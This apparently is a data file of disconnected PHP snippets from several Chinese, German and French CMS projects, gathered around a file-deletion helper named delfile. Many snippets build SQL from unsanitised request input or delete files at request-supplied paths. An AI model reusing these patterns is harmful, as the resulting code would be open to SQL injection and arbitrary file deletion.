function supppage($idpage) { delfile($idpage); global $db; if (!$db->Query("delete from contenu where id=" . $idpage)) { $db->Kill('Error1'); } return true; }
function suppnews($idalbum) { delfile($idalbum); global $db; if (!$db->Query("delete from album where id=" . $idalbum)) { $db->Kill('Error1'); return false; } else { return true; } }
function suppevent($idevent) { delfile($idevent); global $db; if (!$db->Query("delete from event where id=" . $idevent)) { $db->Kill('Error1'); return false; } else { return true; } }
function suppnews($iddoc) { delfile($iddoc); global $db; if (!$db->Query("delete from document where id=" . $iddoc)) { $db->Kill('Error1'); return false; } else { return true; } }
function supppage($idpage) { delfile($idpage); global $db; $parent = $db->QuerySingleValue("SELECT parent from page where id=" . $idpage); $sqlparen = "select id from page where parent=" . $parent; if (!$db->Query("delete from page where id=" . $idpage)) { $db->Kill('Error1'); } if ($parent != "") { if (!$db->Query($sqlparen)) { $db->Kill(""); } if ($db->RowCount() == 0) { if (!$db->Query("update page set app = NULL where id=" . $parent)) { $db->Kill('Error1'); } } } return true; }
echo 'Kategorie erfolgreich editiert!'; } ######################################### ######################################### # Kategorie löschen # ######################################### if ($_GET['go'] == 'delete') { $zeile = file($catfile); $zeilen = sizeof($zeile); for ($i = 0; $i < $zeilen; $i++) { $eintrag = explode('§', $zeile[$i]); if ($eintrag[0] == $_GET['catid']) { if ($eintrag[2] != '') { // Alte Datei löschen $file = $dir . $eintrag[2]; if (delfile($file) == 0) { echo 'Alte Datei konnte nicht gelöscht werden!'; } } $zeilen--; for ($j = $i; $j < $zeilen; $j++) { $zeile[$j] = $zeile[$j + 1]; } } } $fp = fopen($catfile, "w+"); flock($fp, 2); for ($i = 0; $i < $zeilen; $i++) { fwrite($fp, $zeile[$i]); } flock($fp, 3);
$lastid = $dbh->lastInsertId(); $newid = $lastid; echo "<script>document.location='{$scriptname}?action=edititem&id={$newid}'</script>"; echo "<a href='{$scriptname}?action=edititem&id={$newid}'>Go here</a></body></html>"; exit; } /* delete associated file */ if (isset($_GET['delfid'])) { /* displayed from showfiles() */ //remove file link $sql = "DELETE from item2file where itemid={$id} AND fileid=" . $_GET['delfid']; $sth = db_exec($dbh, $sql); //check if others point to this file $nlinks = countfileidlinks($_GET['delfid'], $dbh); if ($nlinks == 0) { delfile($_GET['delfid'], $dbh); } //echo "$nlinks DELETED ".$_GET['delfid']; echo "<script>window.location='{$scriptname}?action={$action}&id={$id}'</script> "; echo "<br><a href='{$scriptname}?action={$action}&id={$id}'>Go here</a></body></html>"; exit; } //check for arguments if (!isset($_GET['id'])) { echo "edititem:missing arguments"; exit; } /* update item data */ //if came here from a form post, update db with new values if (isset($_POST['itemtypeid']) && $_GET['id'] != "new" && isvalidfrm()) { //get form post variables and create the sql query
$dbo = new dbex(); dbtarget('w', $dbServs); $pre = get_argg('pre'); bakindata($dbo, '../docs/' . $pre . '_1.sql'); echo "<script language='javascript'> alert('{$d_langpackage->d_lead_suc}'); location.href=''; </script>"; } //删除备份文件 $fid = get_argg('fid'); if ($fid) { $is_check = check_rights("g05"); if (!$is_check) { echo $m_langpackage->m_no_pri; exit; } $file_pre = $fid . "_1.sql"; delfile('../docs/' . $file_pre); echo "{$d_langpackage->d_del_suc}"; exit; } function delfile($filename, $check = 1) { @chmod($filename, 0777); return @unlink($filename); } function bakindata($dbo, $filename) { $sql = file($filename); $query = ''; $num = 0; foreach ($sql as $key => $value) { $value = trim($value);
function tminisave($have) { global $_M; //新方法 $this->iniclass->tminisave($have); $wap_ok = 0; $cglist = $this->configlist; if ($have['mobile'] == '1') { $have['wap_skin_user'] = $have['met_skin_user']; $have['wap_skin_css'] = $have['met_skin_css']; $cglist = $this->mobile_configlist; //$have['flash_10001'] = $_M['config']['flash_10001']; $have['flash_10001'] = '1|' . $have['met_flash_10001_y']; $wap_ok = 1; } else { /*备用字段*/ $preview['otherinfo']['imgurl1'] = $have['imgurl1']; $preview['otherinfo']['imgurl2'] = $have['imgurl2']; $query = "update {$_M[table][otherinfo]} SET "; for ($i = 1; $i <= 10; $i++) { $infoval = $have['info' . $i]; if (isset($have['info' . $i])) { $query .= "info{$i} = '{$infoval}',"; } } $query .= "\n\t\t\t\timgurl1 = '{$have['imgurl1']}',\n\t\t\t\timgurl2 = '{$have['imgurl2']}'\n\t\t\t\twhere id='{$have['otherinfoid']}'\n\t\t\t"; DB::query($query); load::sys_func('file'); delfile(PATH_WEB . "cache/otherinfo_{$this->lang}.inc.php"); $have['flash_10001'] = '1|' . $have['met_flash_10001_x'] . '|' . $have['met_flash_10001_y'] . '|' . $have['met_flash_10001_imgtype']; } $cglist[] = 'met_productTabok'; $cglist[] = 'met_productTabname'; $cglist[] = 'met_productTabname_1'; $cglist[] = 'met_productTabname_2'; $cglist[] = 'met_productTabname_3'; $cglist[] = 'met_productTabname_4'; configsave($cglist, $have, $this->lang); /*保存系统配置*/ /*保存banner设置*/ $nowidold = array(); $bannerid = DB::get_all("select * from {$_M[table][flash]} where wap_ok='{$wap_ok}' and (module like '%,10001,%' or module = 'metinfo') and lang='{$this->lang}' and img_path!='' order by no_order "); foreach ($bannerid as $key => $val) { $nowidold[] = $val['id']; } $nowidnew = array(); $have['indexbannerlist'] = str_replace("\\", "", $have['indexbannerlist']); $bannerlist = json_decode($have['indexbannerlist'], true); foreach ($bannerlist as $key => $val) { if ($val['img_path'] != '') { if (!strstr($val['img_path'], "../")) { $val['img_path'] = '../' . $val['img_path']; } if ($val['id']) { $query = "update {$_M[table][flash]} SET \n\t\t\t\t\timg_title = '{$val['img_title']}',\n\t\t\t\t\timg_path = '{$val['img_path']}',\n\t\t\t\t\timg_link = '{$val['img_link']}',\n\t\t\t\t\tno_order = '{$key}'\n\t\t\t\t\tWHERE id = '{$val['id']}'"; $nowidnew[] = $val['id']; } else { $query = "INSERT INTO {$_M[table][flash]} SET \n\t\t\t\t\timg_title = '{$val['img_title']}',\n\t\t\t\t\timg_path = '{$val['img_path']}',\n\t\t\t\t\timg_link = '{$val['img_link']}',\n\t\t\t\t\tno_order = '{$key}',\n\t\t\t\t\tmodule = ',10001,',\n\t\t\t\t\twap_ok = '{$wap_ok}',\n\t\t\t\t\tlang = '{$this->lang}'"; } DB::query($query); } } $nowid = array_diff($nowidold, $nowidnew); if ($nowid) { foreach ($nowid as $key => $val) { $query = "delete from {$_M[table][flash]} where id='{$val}'"; DB::query($query); } } }
function output_onpost_table_photosview() { global $vars, $db, $main; if (isset($_POST['id'])) { foreach ((array) $_POST['id'] as $key => $value) { $db->del("photos", "id = '" . $value . "'"); $uploaddir = $vars['folders']['photos']; $filename = 'photo-' . $value . ".*"; delfile(ROOT_PATH . $uploaddir . $filename); $filename = 'photo-' . $value . "-*.*"; delfile(ROOT_PATH . $uploaddir . $filename); } } foreach ((array) array('N', 'NE', 'E', 'SE', 'S', 'SW', 'W', 'NW', 'PANORAMIC') as $value) { if (isset($_FILES[$value]['tmp_name']) && $_FILES[$value]['tmp_name'] != '') { if (@(!imagecreatefromjpeg($_FILES[$value]['tmp_name']))) { continue; } $db->add("photos", array('node_id' => intval(get('node')), 'type' => 'view', 'view_point' => $value, 'info' => $_POST['info-' . $value])); $ins_id = $db->insert_id; $uploaddir = $vars['folders']['photos']; $filename = 'photo-' . $ins_id . '.jpg'; $filename_s = 'photo-' . $ins_id . '-s.jpg'; if (@move_uploaded_file($_FILES[$value]['tmp_name'], ROOT_PATH . $uploaddir . $filename) === FALSE) { $db->del("photos", "id = '" . $ins_id . "'"); log_admin_action($nodes, "#photos_node#" . get('node'), "upload_failed"); #@# $main->message->set_fromlang("error", "upload_file_failed"); return; } if ($value == 'PANORAMIC') { $image_s = resizeJPG(ROOT_PATH . $uploaddir . $filename, 600, 200); } else { $image_s = resizeJPG(ROOT_PATH . $uploaddir . $filename, 200, 200); } imagejpeg($image_s, ROOT_PATH . $uploaddir . $filename_s); } elseif ($_POST['info-' . $value] != '') { $db->set("photos", array('info' => $_POST['info-' . $value]), "node_id = " . intval(get('node')) . " AND view_point = '" . $value . "'"); } } log_admin_action($nodes, "#photos_node#" . get('node'), "update_success"); #@# $main->message->set_fromlang('info', 'update_success', makelink("", TRUE)); }
function deletefile($fid) { global $DreamCMS; $rs = $DreamCMS->db->get_row("SELECT * FROM `#DC@__file` WHERE `id`='{$fid}' LIMIT 1"); delfile(DCPATH . $rs->path); if ($rs->thumbpath) { delfile(DCPATH . $rs->thumbpath); $DreamCMS->db->query("UPDATE `#DC@__article` SET `pic`='' WHERE `pic`='{$rs->thumbpath}'"); } $DreamCMS->db->query("UPDATE `#DC@__article` SET `pic`='' WHERE `pic`='{$rs->path}'"); $DreamCMS->db->query("DELETE FROM `#DC@__file` WHERE `id`='{$fid}' LIMIT 1"); return true; }
function deletefile($fid) { global $iCMS; $rs = $iCMS->db->getRow("SELECT * FROM `#iCMS@__file` WHERE `id`='{$fid}' LIMIT 1"); $thumbfilepath = gethumb($rs->path, '', '', true, true); delfile(iPATH . $rs->path, false); echo $rs->path . ' 文件删除…<span style="color:green;">√</span><br />'; if ($thumbfilepath) { foreach ($thumbfilepath as $wh => $fp) { delfile($fp, false); echo '缩略图 ' . $wh . ' 文件删除…<span style="color:green;">√</span><br />'; } } $iCMS->db->query("UPDATE `#iCMS@__article` SET `pic`='' WHERE `pic`='{$rs->path}'"); $iCMS->db->query("DELETE FROM `#iCMS@__file` WHERE `id`='{$fid}' LIMIT 1"); return true; }
$tmp_name = $_FILES['face']['tmp_name']; $tmp_file_name_arr = explode('.', $filename); $new_file_name = $tmp_file_name_arr[0] . '_' . time() . '.' . $tmp_file_name_arr[1]; if (file_exists($_FILES['face']['tmp_name'])) { savefile($tmp_name, $new_file_name); } else { $result = array('status' => -1, 'msg' => '上传图片失败'); echo json_encode($result); return; } $url = $host_sae . $new_file_name; $result = array('status' => 1, 'msg' => 'ok', 'info' => array('url' => $url)); $r = detect($url); if ($r['status'] == 1) { if (empty($r['output']['face'])) { delfile($new_file_name); $result = array('status' => -2, 'msg' => '上传的图片没有脸呀,亲'); echo json_encode($result); return; } $college_id = charge($r['output']); $result['info']['college'] = array('id' => $college_id, 'name' => $college[$college_id]); $result['info']['face'] = $r['output']['face']; } echo json_encode($result); return; } function detect($url) { if (!$url) { return array('status' => -1);
/** * 删除文件夹 * @param string $fileDir 要删除的文件夹 * @param int $type 0:删除本文件夹及文件夹下文件,1:只删除本文件夹下的文件。默认都删除 * @return boolean 删除成功返回true,否则返回false */ function deldir($fileDir, $type = 0) { $fileDir = path_absolute($fileDir); @clearstatcache(); $fileDir = substr($fileDir, -1) == '/' ? $fileDir : $fileDir . '/'; if (!is_dir($fileDir)) { return false; } $resource = opendir($fileDir); @clearstatcache(); while (($file = readdir($resource)) !== false) { if ($file == '.' || $file == '..') { continue; } if (!is_dir($fileDir . $file)) { delfile($fileDir . $file); } else { deldir($fileDir . $file); } } closedir($resource); @clearstatcache(); if ($type == 0) { rmdir($fileDir); } return true; }
$htaccess = "RewriteEngine On\n"; $htaccess .= "RewriteBase {$iCMS->dir}\n"; $htaccess .= "# 首页\n"; $htaccess .= "RewriteRule ^index" . preg_quote($_POST['rewrite']['ext'], '/') . "\$ index.php\n"; $htaccess .= "# 独立页面、栏目、文章、评论、搜索、留言、标签\n"; if ($_POST['customlink'] == '2' && empty($_POST['rewrite']['dir'])) { if ($_POST['linkmode'] == 'id') { $htaccess .= "RewriteRule ^(list|show){$preg_quote_split}(.*)\$ \$1.php?id{$preg_quote_split}\$2\n"; } elseif ($_POST['linkmode'] == 'title') { $htaccess .= "RewriteRule ^(list|show){$preg_quote_split}(.*)\$ \$1.php?t{$preg_quote_split}\$2\n"; } $htaccess .= "RewriteRule ^index{$preg_quote_split}page{$preg_quote_split}(.*)" . preg_quote($_POST['rewrite']['ext'], '/') . "\$ index.php?page{$preg_quote_split}\$1" . preg_quote($_POST['rewrite']['ext'], '/') . "\n"; $htaccess .= "RewriteRule ^index{$preg_quote_split}(.*)" . preg_quote($_POST['rewrite']['ext'], '/') . "\$ index.php?p{$preg_quote_split}\$1" . preg_quote($_POST['rewrite']['ext'], '/') . "\n"; $htaccess .= "RewriteRule ^comment{$preg_quote_split}(.*)\$ comment.php?aid{$preg_quote_split}\$1\n"; $htaccess .= "RewriteRule ^tag{$preg_quote_split}(.*)\$ tag.php?t{$preg_quote_split}\$1\n"; $htaccess .= "RewriteRule ^search{$preg_quote_split}(.*)\$ search.php?keyword{$preg_quote_split}\$1\n"; } else { $htaccess .= "RewriteRule ^(index|list|show|comment|search|message|tag)" . preg_quote($_POST['rewrite']['dir'], '/') . "(.*)\$ \$1.php?\$2\n"; } writefile(iPATH . '.htaccess', $htaccess); } if ($_POST['ishtm'] == "1") { delfile(iPATH . '.htaccess'); // delfile(iPATH.$config['indexname'].'.html'); } $iCMS->clear_compiled_tpl(); redirect('配置已更新', __REF__); } exit; } include iCMS_admincp_tpl("setting");
return sprintf($retstring, $size, $sizestring); } if (isset($ydel) && $ydel != "") { delDir($ydel); } if (isset($mdel) && $mdel != "") { delDir($mdel); } if (isset($fdel) && $fdel != "") { delfile($fdel); } if (isset($mzip) && $mzip != "") { makeZip($mzip, $path, $year, $month); } if (isset($ipdel) && $ipdel != "" && $done) { delfile($ipdel); copy("config/index/chat_ip_logs.htm", "acount/pages/chat_ip_logs.htm"); chmod("acount/pages/chat_ip_logs.htm", 0666); } ?> <A NAME="home"></A> <?php if (isset($Message)) { echo "<div><table align=center border=0 cellpadding=3 class=menu style=background:white><tr><td class=success align=center><br /><h4>" . $Message . "</h4></td></tr></table></div>"; } if (file_exists("acount/pages/chat_ip_logs.htm")) { ?> <P CLASS=title><?php echo sprintf(A_CHAT_LOGS_1, APP_NAME); ?> </P>
function MakeArticleHtm($aid = '', $p = '1') { global $DreamCMS; if (!$DreamCMS->config['ishtm'] || empty($aid)) { return false; } $DreamCMS->mode = 'CreateHtml'; //$htmldate=$DreamCMS->Show($aid,$p); //原 $htmldate = $DreamCMS->Show($aid, $p, 1); //zhaoyanmin 更新静态页和添加静态页时有跳转地址防止跳转 //$body=explode('<div style="page-break-after: always"><span style="display: none"> </span></div>',$DreamCMS->result->body); $body = explode('<div style="page-break-after: always;"><span style="DISPLAY:none"> </span></div>', $DreamCMS->result->body); //zhaoyanmin 内容分页 $total = count($body); if ($DreamCMS->config['htmdircreaterule'] == '0') { $FDir = $DreamCMS->result->catalogdir; } elseif ($DreamCMS->config['htmdircreaterule'] == '1') { $FDir = _getdate('Y-m-d'); } elseif ($DreamCMS->config['htmdircreaterule'] == '2') { $FDir = str_replace(array('Y', 'y', 'm', 'n', 'd', 'j', 'C'), array(_getdate('Y'), _getdate('y'), _getdate('m'), _getdate('n'), _getdate('d'), _getdate('j'), $DreamCMS->result->catalogdir), $DreamCMS->config['customhtmdircreaterule']); } else { $FDir = _getdate('Ymd'); } $ODir = substr($DreamCMS->result->filename, 0, strrpos($DreamCMS->result->filename, '/')); $_Dir = $ODir == $FDir ? $ODir : $FDir; $RootDir = DCPATH . $DreamCMS->config['htmdir'] . $_Dir; createdir($RootDir); switch ($DreamCMS->config['htmnamerule']) { case "0": $filename = $DreamCMS->result->id; break; case "pinyin": $filename = $DreamCMS->result->customlink; break; case "pubdate": $filename = $DreamCMS->result->pubdate; break; default: $filename = $DreamCMS->result->id; } $NewFileName = $_Dir . '/' . $filename; $total > 1 && $p != 1 && ($filename .= '_' . $p); $FilePath = $RootDir . "/{$filename}" . $DreamCMS->config['htmlext']; if ($NewFileName == $DreamCMS->result->filename) { writefile($FilePath, $htmldate); } else { delfile(DCPATH . $DreamCMS->config['htmdir'] . $DreamCMS->result->filename . $DreamCMS->config['htmlext']); if ($total > 1) { for ($i = 1; $i <= $total; $i++) { delfile(DCPATH . $DreamCMS->config['htmdir'] . $DreamCMS->result->filename . '_' . $i . $DreamCMS->config['htmlext']); } } writefile($FilePath, $htmldate); } $total > 1 && $p < $total && MakeArticleHtm($aid, $p + 1); $DreamCMS->db->query("UPDATE `#DC@__article` SET `filename` = '{$NewFileName}' WHERE `id` ='{$aid}'"); return true; }
$AppUI->setMsg('You dont have permission to ' . $cmd . ' file', UI_MSG_ERROR); $AppUI->redirect('&m=tasks&a=view&task_id=' . $obj->task_id); exit; } switch ($cmd) { case 'get': getfile(); break; case 'put': putfile(); break; case 'update': updatefile(); break; case 'delete': delfile(); break; default: break; } $task_folder = $root . '/' . $obj->task_project . '/' . $obj->task_id; if (!is_dir($task_folder)) { if (version_compare(phpversion(), '5.0') < 0) { $project_folder = $root . '/' . $obj->task_project; if (!is_dir($root)) { mkdir($root, 0700); } if (!is_dir($project_folder)) { mkdir($project_folder, 0700); } if (!is_dir($task_folder)) {
function DelBanner($id = 0) { if ($id > 0) { $_REQUEST['id'] = $id; } $dataset = new A_DataSet(STRUCTURE); if ($row = $dataset->Delete()) { delfile($row['filepath']); return true; } else { return false; } }
if ($_POST['linkmode'] == 'id') { $htaccess .= "RewriteRule ^(list|show){$preg_quote_split}(.*)\$ \$1.php?id{$preg_quote_split}\$2\n"; } elseif ($_POST['linkmode'] == 'title') { $htaccess .= "RewriteRule ^(list|show){$preg_quote_split}(.*)\$ \$1.php?t{$preg_quote_split}\$2\n"; } $htaccess .= "RewriteRule ^(index){$preg_quote_split}(.*)\$ \$1.php?p{$preg_quote_split}\$2\n"; $htaccess .= "RewriteRule ^(comment){$preg_quote_split}(.*)\$ \$1.php?aid{$preg_quote_split}\$2\n"; $htaccess .= "RewriteRule ^(tag){$preg_quote_split}(.*)\$ \$1.php?t{$preg_quote_split}\$2\n"; $htaccess .= "RewriteRule ^(search){$preg_quote_split}(.*)\$ \$1.php?keyword{$preg_quote_split}\$2\n"; } else { $htaccess .= "RewriteRule ^(index|list|show|comment|search|message|tag)" . preg_quote($_POST['rewrite']['dir'], '/') . "(.*)\$ \$1.php?\$2\n"; } writefile(DCPATH . '.htaccess', $htaccess); } if ($_POST['ishtm'] == "1") { delfile(DCPATH . '.htaccess'); // delfile(DCPATH.$config['indexname'].'.html'); } $DreamCMS->clear_compiled_tpl(); redirect('配置已更新', $_SERVER['HTTP_REFERER']); } exit; } da_admin_head(); ?> <link rel="stylesheet" href="images/style.css" type="text/css" media="all" /> <script type="text/JavaScript">admincpnav('首页 » 系统设置','');</script> <div class="container" id="cpcontainer"> <h3>系统设置</h3> <form name="cpform" method="post" action="admincp.php?do=setting&operation=post" id="cpform" >
$db->query($query); } } $db->query("INSERT INTO " . $tablepre . "admin_member(username,password,name,sex,intotime,intime,outtime,ipadd,hit,powergroup,inputclassid,isclass) VALUES ('{$username}','{$password}','{$username}',1,{$nowtime},{$nowtime},{$nowtime},0,0,1,1,1)"); $db->query("UPDATE " . $tablepre . "config SET value='{$domain}' WHERE valname='domain'"); $db->query("UPDATE " . $tablepre . "config SET value='{$sitename}' WHERE valname='sitename'"); $db->query("UPDATE " . $tablepre . "config SET value='{$admine_mail}' WHERE valname='admine_mail'"); $db->query("UPDATE " . $tablepre . "lngpack SET langstr='{$sitename}' WHERE keycode='sitename'"); foreach ($func_app as $key => $value) { if ($value['isdel'] && !in_array($value['appcode'], $apptype)) { $app_sql_menuid = implode(',', $value['menuid']); $db_where = "mlid IN ({$app_sql_menuid})"; $db->query('UPDATE ' . $tablepre . 'menulink SET isclass=0 WHERE ' . $db_where); $db->query('UPDATE ' . $tablepre . 'apply SET isetup=0 WHERE ' . "applycode='{$value['appcode']}'"); foreach ($value['file'] as $filename) { $appdelfile = admin_ROOT . $filename; delfile($appdelfile); } } else { $db->query('UPDATE ' . $tablepre . 'apply SET isetup=1 WHERE ' . "applycode='{$value['appcode']}'"); } } if (!file_exists($installlock)) { @touch(admin_ROOT . './datacache/install.lock'); } $setupclass = true; if ($setupclass) { echo '<script type="text/javascript">document.getElementById("laststep").disabled=false;document.getElementById("laststep").value = \'安装成功\';</script>' . "\r\n"; } } }
function delArticle($id, $uid = '-1', $postype = '1') { global $iCMS; $sql = $uid != "-1" ? "and `userid`='{$uid}' and `postype`='{$postype}'" : ""; $id = (int) $id; $art = $iCMS->db->getRow("SELECT * FROM `#iCMS@__article` WHERE id='{$id}' {$sql} Limit 1"); if ($art->pic) { $usePic = $iCMS->db->getValue("SELECT id FROM `#iCMS@__article` WHERE `pic`='{$art->pic}' and `id`<>'{$id}'"); if (empty($usePic)) { $thumbfilepath = gethumb($art->pic, '', '', true, true); delfile(iPATH . $art->pic); echo $art->pic . ' 文件删除…<span style="color:green;">√</span><br />'; if ($thumbfilepath) { foreach ($thumbfilepath as $wh => $fp) { delfile($fp); echo '缩略图 ' . $wh . ' 文件删除…<span style="color:green;">√</span><br />'; } } $iCMS->db->query("DELETE FROM `#iCMS@__file` WHERE `path` = '{$art->pic}'"); echo $art->pic . ' 数据删除…<span style="color:green;">√</span><br />'; } else { echo $art->pic . '文件 其它文章正在使用,请到文件管理删除…<span style="color:green;">×</span><br />'; } } $catalog = $iCMS->cache('catalog.cache', 'include/syscache', 0, true); $art->catalogdir = $iCMS->cdir($catalog[$art->cid]); $_urlArray = array('id' => $art->id, 'link' => $art->customlink, 'url' => $art->url, 'dir' => $art->catalogdir, 'pubdate' => $art->pubdate); $body = $iCMS->db->getValue("SELECT `body` FROM `#iCMS@__articledata` WHERE aid='{$id}' Limit 1"); if ($iCMS->config['ishtm'] && empty($art->url)) { $bArray = explode('<div style="page-break-after: always"><span style="display: none"> </span></div>', $body); $total = count($bArray); if ($total > 1) { for ($i = 0; $i <= $total; $i++) { $filename = $iCMS->iurl('show', $_urlArray, $i, iPATH); echo getfilepath($filename, iPATH, '-') . ' 静态文件删除…<span style="color:green;">√</span><br />'; delfile($filename, false); } } } $frs = $iCMS->db->getArray("SELECT `path` FROM `#iCMS@__file` WHERE `aid`='{$id}'"); for ($i = 0; $i < count($frs); $i++) { if (!empty($frs[$i])) { $frs[$i]['path'] && delfile(iPATH . $frs[$i]['path']); echo $frs[$i]['path'] . ' 文件删除…<span style="color:green;">√</span><br />'; } } if ($art->tags) { $tagArray = explode(",", $art->tags); foreach ($tagArray as $k => $v) { if ($iCMS->db->getValue("SELECT `count` FROM `#iCMS@__tags` WHERE `name`='{$v}'") == "1") { $iCMS->db->query("DELETE FROM `#iCMS@__tags` WHERE `name`='{$v}'"); } else { $iCMS->db->query("UPDATE `#iCMS@__tags` SET `count`=count-1 WHERE `name`='{$v}'"); } } echo ' 标签更新…<span style="color:green;">√</span><br />'; } $iCMS->db->query("DELETE FROM `#iCMS@__file` WHERE `aid`='{$id}'"); echo ' 相关文件数据删除…<span style="color:green;">√</span><br />'; $iCMS->db->query("DELETE FROM `#iCMS@__comment` WHERE aid='{$id}'"); echo ' 评论数据删除…<span style="color:green;">√</span><br />'; $iCMS->db->query("DELETE FROM `#iCMS@__article` WHERE id='{$id}'"); $iCMS->db->query("DELETE FROM `#iCMS@__articledata` WHERE `id`='{$id}'"); echo ' 文章数据删除…<span style="color:green;">√</span><br />'; $iCMS->db->query("UPDATE `#iCMS@__catalog` SET `count` = count-1 WHERE `id` ='{$art->cid}' LIMIT 1"); echo ' 栏目数据更新…<span style="color:green;">√</span><br />'; echo ' 删除完成…<span style="color:green;">√</span><br />'; return true; }
function delfile($deldir) { if (@is_file($deldir)) { @chmod($deldir, 0777); return @unlink($deldir); } else { if (@is_dir($deldir)) { if (($mydir = @opendir($deldir)) == NULL) { return false; } while (false !== ($file = @readdir($mydir))) { $name = File_Str($deldir . '/' . $file); if ($file != '.' && $file != '..') { delfile($name); } } @closedir($mydir); @chmod($deldir, 0777); return @rmdir($deldir) ? true : false; } } }
function delfile($arg) { if (file_exists($arg)) { @chmod($arg, 0755); if (is_dir($arg)) { $handle = opendir($arg); while (false !== ($aux = readdir($handle))) { if ($aux != "." && $aux != "..") { delfile($arg . "/" . $aux); } } @closedir($handle); rmdir($arg); } else { unlink($arg); } } }
} if ($width == $_width && $height == $_height) { //不对源图缩放 $_img = icf($tMap[$type], $iPic); $_Type = $_img['type']; } else { $img = icf($tMap[$type], $iPic); $_Type = $img['type']; if ($img['res']) { $thumb = imagecreatetruecolor($_width, $_height); imagecopyresampled($thumb, $img['res'], 0, 0, 0, 0, $_width, $_height, $width, $height); $_tmpfile = $iCMS->config['uploadfiledir'] . '/crop_tmp_' . time() . rand(1, 999999); __image($thumb, $_Type, getfilepath($_tmpfile, iPATH, '+')); $_tmpfile .= '.' . $_Type; $_img = icf($tMap[$type], $_tmpfile); delfile($_tmpfile); } } if ($_img['res']) { $_thumb = imagecreatetruecolor($w, $h); imagecopyresampled($_thumb, $_img['res'], 0, 0, $x, $y, $w, $h, $w, $h); $thumbpath = substr($iPic, 0, strrpos($iPic, '/')) . "/thumb"; $picName = substr($iPic, 0, strrpos($iPic, '.')); $picName = substr($picName, strrpos($picName, '/')); $fileName = $thumbpath . $picName . '_' . $w . 'x' . $h; createdir($thumbpath); __image($_thumb, $_img['type'], $fileName); $fileName .= '.' . $_Type; alert($pic . ' 剪裁成功!', 'javascript:insert("' . $iCMS->dir . getfilepath($fileName, iPATH, '-') . '","' . $_POST['in'] . '");'); } break;
function File_Delete($file, $folder){ if (file_exists($folder.$file)){ delfile($folder.$file); } }
function delArticle($id) { global $DreamCMS; $id = (int) $id; $art = $DreamCMS->db->get_row("SELECT `pic`,`filename`,`cid`,`tags`FROM `#DC@__article` WHERE id='{$id}' Limit 1"); if ($art->pic) { $thumbfilepath = gethumb($art->pic); delfile(DCPATH . $art->pic); $thumbfilepath && delfile(DCPATH . $art->pic); $DreamCMS->db->query("DELETE FROM `#DC@__file` WHERE `path` = '{$art->pic}'"); } $body = $DreamCMS->db->get_var("SELECT `body` FROM `#DC@__articledata` WHERE aid='{$id}' Limit 1"); if ($art->filename) { $bArray = explode('<div style="page-break-after: always"><span style="display: none"> </span></div>', $body); $total = count($bArray); delfile(DCPATH . $DreamCMS->config['htmdir'] . $art->filename . ".html"); if ($total > 1) { for ($i = 1; $i <= $total; $i++) { delfile(DCPATH . $DreamCMS->config['htmdir'] . $art->filename . '_' . $i . '.html'); } } } $frs = $DreamCMS->db->get_results("SELECT `path`, `thumbpath` FROM `#DC@__file` WHERE `aid`='{$id}'"); for ($i = 0; $i < count($frs); $i++) { if (!empty($frs[$i])) { $frs[$i]['path'] && delfile(DCPATH . $frs[$i]['path']); $frs[$i]['thumbpath'] && delfile(DCPATH . $frs[$i]['thumbpath']); } } if ($art->tags) { $tagArray = explode(" ", $art->tags); foreach ($tagArray as $k => $v) { if ($DreamCMS->db->get_var("SELECT `count` FROM `#DC@__tags` WHERE `name`='{$v}'") == "1") { $DreamCMS->db->query("DELETE FROM `#DC@__tags` WHERE `name`='{$v}'"); } else { $DreamCMS->db->query("UPDATE `#DC@__tags` SET `count`=count-1 WHERE `name`='{$v}'"); } } } $DreamCMS->db->query("DELETE FROM `#DC@__file` WHERE `aid`='{$id}'"); $DreamCMS->db->query("DELETE FROM `#DC@__comment` WHERE aid='{$id}'"); $DreamCMS->db->query("DELETE FROM `#DC@__article` WHERE id='{$id}'"); $DreamCMS->db->query("DELETE FROM `#DC@__articledata` WHERE `id`='{$id}'"); $DreamCMS->db->query("UPDATE `#DC@__catalog` SET `count` = count-1 WHERE `id` ='{$art->cid}' LIMIT 1"); return true; }
function dositemapeditor() { global $_M; $configlist = array(); $configlist[] = 'met_sitemap_auto'; $configlist[] = 'met_sitemap_not1'; $configlist[] = 'met_sitemap_not2'; $configlist[] = 'met_sitemap_lang'; $configlist[] = 'met_sitemap_xml'; $configlist[] = 'met_sitemap_txt'; configsave($configlist); /*保存系统配置*/ load::sys_func('file'); /*验证读写权限*/ function yanquan($fname) { global $_M; $r = false; if (!file_exists(PATH_WEB . $fname)) { file_put_contents(PATH_WEB . $fname, 'metinfo'); $str = 'metinfo'; } else { $str = file_get_contents(PATH_WEB . $fname); } if (!file_put_contents(PATH_WEB . $fname, $str)) { $r = true; } return $r; } $err = false; if (!$_M['form']['met_sitemap_xml']) { delfile(PATH_WEB . "/sitemap.xml"); } else { $err = yanquan('sitemap.xml'); } if (!$_M['form']['met_sitemap_txt']) { delfile(PATH_WEB . "/sitemap.txt"); } else { $err = yanquan('sitemap.txt'); } if ($err) { turnover("{$_M[url][own_form]}a=dositemap", $_M['form']['otherinfocache2']); } else { $sitemaptype = $_M['form']['met_sitemap_xml'] ? 'xml' : ($_M['form']['met_sitemap_txt'] ? 'txt' : 0); sitemap_robots($sitemaptype); if ($_M['form']['met_sitemap_xml'] || $_M['form']['met_sitemap_txt']) { $gent = "sitemap/index.php?lang={$_M[lang]}&htmsitemap={$_M['config']['met_member_force']}"; $curl = load::sys_class('curl', 'new'); $curl->set('host', $_M['url']['site']); $curl->set('file', $gent); $post = array('post' => ''); $curl->curl_post($post); } turnover("{$_M[url][own_form]}a=dositemap"); } }
function delfiles($files) { $result = array("error" => -2); $path = $_SERVER['DOCUMENT_ROOT']; $path = trim($path, "/"); $reffiles = array(); $befordelfun = $config["beforedelfile"]; $afterdelfun = $config["afterdelfile"]; if (is_array($files)) { for ($i = 0; $i < count($files); $i++) { if (!delfile($files[$i], $befordelfun, $afterdelfun, $path)) { $reffiles[] = $files[$i]->fname; } } } else { if (!delfile($files, $befordelfun, $afterdelfun, $path)) { $reffiles[] = $files->fname; } } if (count($reffiles) > 0) { $result = array("error" => -3, "nrfiles" => $reffiles); } else { $result = array("error" => 0); } return $result; }
